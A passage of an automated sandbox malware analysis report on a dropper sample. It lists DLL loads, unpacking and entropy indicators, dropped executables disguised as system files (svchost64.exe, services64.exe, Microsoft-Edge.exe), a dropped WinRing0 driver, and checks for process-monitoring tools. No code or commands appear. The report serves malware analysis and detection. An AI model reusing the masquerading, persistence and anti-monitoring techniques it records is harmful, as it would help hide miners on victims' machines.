                        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: version.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: file.exeStatic file information: File size 1862656 > 1048576
                        Source: file.exeStatic PE information: Raw size of nataabbx is bigger than: 0x100000 < 0x195200
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: miner2.0.exe.82.drStatic PE information: real checksum: 0x0 should be: 0x18d41
                        Source: axplong.exe.0.drStatic PE information: real checksum: 0x1c94ce should be: 0x1ceea0
                        Source: svchost64.exe.85.drStatic PE information: real checksum: 0x0 should be: 0x9e48
                        Source: services64.exe.107.drStatic PE information: real checksum: 0x0 should be: 0x18d41
                        Source: file.exeStatic PE information: real checksum: 0x1c94ce should be: 0x1ceea0
                        Source: sihost64.exe.139.drStatic PE information: real checksum: 0x0 should be: 0xcc5b
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: nataabbx
                        Source: file.exeStatic PE information: section name: ijueevze
                        Source: file.exeStatic PE information: section name: .taggant
                        Source: axplong.exe.0.drStatic PE information: section name:
                        Source: axplong.exe.0.drStatic PE information: section name: .idata
                        Source: axplong.exe.0.drStatic PE information: section name:
                        Source: axplong.exe.0.drStatic PE information: section name: nataabbx
                        Source: axplong.exe.0.drStatic PE information: section name: ijueevze
                        Source: axplong.exe.0.drStatic PE information: section name: .taggant
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: .xdata
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /4
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /19
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /31
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /45
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /57
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /70
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /81
                        Source: loader_5879465914[1].exe.6.drStatic PE information: section name: /92
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: .xdata
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /4
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /19
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /31
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /45
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /57
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /70
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /81
                        Source: loader_5879465914.exe.6.drStatic PE information: section name: /92
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: .xdata
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /4
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /19
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /31
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /45
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /57
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /70
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /81
                        Source: Microsoft-Edge.exe.7.drStatic PE information: section name: /92
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C3D84C push ecx; ret 6_2_00C3D85F
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeCode function: 85_2_00007FFD9BAC00BD pushad ; iretd 85_2_00007FFD9BAC00C1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 107_2_00007FFD9BAC01BD push E95E5098h; ret 107_2_00007FFD9BAC0259
                        Source: C:\Windows\System32\services64.exeCode function: 114_2_00007FFD9BAD00BD pushad ; iretd 114_2_00007FFD9BAD00C1
                        Source: C:\Windows\System32\services64.exeCode function: 122_2_00007FFD9BAA00BD pushad ; iretd 122_2_00007FFD9BAA00C1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 139_2_00007FFD9BAA01BD push E95E5298h; ret 139_2_00007FFD9BAA0259
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 144_2_00007FFD9BAC01BD push E95E5098h; ret 144_2_00007FFD9BAC0259
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 149_2_00007FFD9BA901BD push E95E5398h; ret 149_2_00007FFD9BA90259
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 159_2_00007FFD9BAD01BD push E95E4F98h; ret 159_2_00007FFD9BAD0259
                        Source: file.exeStatic PE information: section name: entropy: 7.9826212288436125
                        Source: file.exeStatic PE information: section name: nataabbx entropy: 7.954246533814316
                        Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.9826212288436125
                        Source: axplong.exe.0.drStatic PE information: section name: nataabbx entropy: 7.954246533814316
                        Source: miner2.0.exe.82.drStatic PE information: section name: .text entropy: 7.899470281638457
                        Source: svchost64.exe.85.drStatic PE information: section name: .text entropy: 7.409218062568192
                        Source: services64.exe.107.drStatic PE information: section name: .text entropy: 7.899470281638457

                        Persistence and Installation Behavior

                        barindex
                        Drops executables to the windows directory (C:\Windows) and starts them
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeExecutable created and started: C:\Windows\system32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeExecutable created and started: C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        Sample is not signed and drops a device driver
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\Microsoft\Libs\WR64.sys
                        Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\miner2.0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\Microsoft\Libs\sihost64.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeFile created: C:\Users\user\AppData\Local\Temp\svchost64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\Microsoft\Libs\WR64.sysJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\services64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\Microsoft\Libs\sihost64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\Microsoft\Libs\WR64.sysJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\System32\services64.exeJump to dropped file

                        Boot Survival

                        barindex
                        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
